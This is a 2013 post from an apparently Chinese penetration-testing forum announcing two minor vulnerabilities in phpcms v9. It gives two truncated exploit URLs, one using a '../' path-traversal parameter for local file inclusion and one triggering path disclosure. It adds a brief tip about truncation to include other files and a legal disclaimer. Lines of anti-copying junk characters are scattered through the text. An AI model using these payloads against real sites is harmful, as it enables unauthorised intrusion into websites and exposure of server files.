中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
+ x. T Q% v, O3 h( ]
6 a, w0 w% F/ |: o0 V! X* J! [3 V
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
- {/ z; D! d0 Y, B: K6 e
+ v% P2 v$ {& @
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
- }$ |& |3 X8 {2 ]8 A0 _! f
6 x+ f( {7 w2 _5 n5 z( ]8 t" [
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
+ u+ `$ Q# o x a
- a# X+ M6 u# U# E b% `- Z1 y4 p
#暴路径
" r/ U1 D0 i v' z3 H- ~7 H
" A5 ?) U" ?, F" G# _
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
2 F) `" W, q" \$ v
1 S% O1 Z+ Y7 z. ~9 u. d3 m
0 Q" [; n- T L" p- k1 J
# r- d5 w7 k |
+1
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2